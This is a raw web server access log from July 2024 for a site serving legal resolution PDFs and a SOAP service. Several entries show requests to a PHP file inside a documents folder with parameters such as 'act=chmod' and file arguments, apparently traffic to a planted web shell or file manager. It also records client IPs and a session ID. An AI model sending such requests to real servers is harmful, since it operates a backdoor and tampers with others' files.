192.178.6.6 - - [04/Jul/2024:02:20:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%20401-450/00000405.tif HTTP/1.1" 200 95504
47.128.113.9 - - [04/Jul/2024:02:20:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=4678.pdf HTTP/1.1" 200 2714
192.178.6.5 - - [04/Jul/2024:02:20:27 -0500] "GET /BLA/resoluciones/AUTOS%202013/1026.pdf HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:02:20:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.113.90 - - [04/Jul/2024:02:20:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=4527.pdf HTTP/1.1" 200 2739
172.22.2.4 - - [04/Jul/2024:02:19:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
47.128.113.169 - - [04/Jul/2024:02:20:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=5177.pdf HTTP/1.1" 200 2739
47.128.113.1 - - [04/Jul/2024:02:21:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=5260.pdf HTTP/1.1" 200 2740
47.128.113.117 - - [04/Jul/2024:02:21:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&c=1&f=02794.pdf HTTP/1.1" 200 2740
192.178.6.5 - - [04/Jul/2024:02:21:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%201993/0068.pdf HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:02:21:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.58.103 - - [04/Jul/2024:02:21:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=5091.pdf HTTP/1.1" 200 2739
47.128.63.70 - - [04/Jul/2024:02:21:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=5540.pdf HTTP/1.1" 200 2738
201.245.192.253 - - [04/Jul/2024:02:19:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34986
167.94.146.57 - - [04/Jul/2024:02:22:08 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [04/Jul/2024:02:22:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
167.94.146.57 - - [04/Jul/2024:02:22:12 -0500] "GET / HTTP/1.1" 200 319
167.94.146.57 - - [04/Jul/2024:02:22:12 -0500] "PRI * HTTP/2.0" 400 946
167.94.146.57 - - [04/Jul/2024:02:22:13 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
216.245.221.92 - - [04/Jul/2024:02:22:13 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [04/Jul/2024:02:22:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [04/Jul/2024:02:23:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
201.245.192.253 - - [04/Jul/2024:02:23:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
168.119.252.253 - - [04/Jul/2024:02:23:37 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [04/Jul/2024:02:24:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [04/Jul/2024:02:24:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
192.178.6.6 - - [04/Jul/2024:02:25:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/8651.pdf HTTP/1.1" 200 122150
201.245.192.253 - - [04/Jul/2024:02:25:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:02:24:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [04/Jul/2024:02:26:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
157.55.39.8 - - [04/Jul/2024:02:26:18 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2018%2F HTTP/1.1" 200 288221
201.245.192.253 - - [04/Jul/2024:02:26:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:02:24:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
201.245.192.253 - - [04/Jul/2024:02:26:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38708
201.245.192.253 - - [04/Jul/2024:02:26:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34986
157.55.39.8 - - [04/Jul/2024:02:26:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202024/00060.pdf HTTP/1.1" 200 516402
216.245.221.92 - - [04/Jul/2024:02:27:13 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [04/Jul/2024:02:27:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [04/Jul/2024:02:28:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
201.245.192.253 - - [04/Jul/2024:02:28:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
192.178.6.5 - - [04/Jul/2024:02:28:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4415.pdf HTTP/1.1" 200 603077
192.178.6.7 - - [04/Jul/2024:02:28:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/7032.pdf HTTP/1.1" 200 734521
201.245.192.253 - - [04/Jul/2024:02:28:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [04/Jul/2024:02:29:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33632
201.245.192.253 - - [04/Jul/2024:02:29:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [04/Jul/2024:02:29:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34986
201.245.192.253 - - [04/Jul/2024:02:30:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
192.178.6.5 - - [04/Jul/2024:02:30:29 -0500] "GET /BLA/resoluciones/AUTOS%202018/5871.pdf HTTP/1.1" 200 633552
201.245.192.253 - - [04/Jul/2024:02:30:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
157.55.39.60 - - [04/Jul/2024:02:31:20 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2009%2F HTTP/1.1" 200 1694101
192.178.6.6 - - [04/Jul/2024:02:31:30 -0500] "GET /Publicaciones/2024EE87385.pdf HTTP/1.1" 404 227
201.245.192.253 - - [04/Jul/2024:02:31:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:02:29:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
